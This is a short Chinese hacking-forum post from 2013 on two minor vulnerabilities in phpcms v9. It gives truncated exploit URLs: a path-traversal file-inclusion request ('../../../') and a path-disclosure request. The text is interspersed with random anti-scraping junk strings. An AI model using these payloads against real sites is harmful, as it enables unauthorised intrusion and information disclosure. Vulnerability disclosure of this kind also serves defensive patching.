中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
+ y$ x5 [& g1 [1 W/ l
9 I& A5 Q4 w/ N2 j- [
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
+ w& e6 V# D" v R7 M, e# J
- l' k: j( o7 r# N' h: F1 M. R
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
; }0 w7 H8 T- o% k0 ]" h% T1 ?
' w8 u; I, A, ^0 D8 F* F
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
. C; X: g+ l4 p, ]. o B3 y0 ?/ l
6 S- h: k1 ^ ^* l: T; N
#暴路径
/ S e0 m, a1 U9 D0 Z, V& y. N
( ^/ D( B# ]1 d! F: Y; A
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
0 F% Z/ ^* z& p$ o' @3 P9 U& q, I
7 h! }$ z3 B$ N, C& b) S; }) C5 W
+ s) e) b8 a- Y$ @
1 h# R/ g& h! g f; R0 ]
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2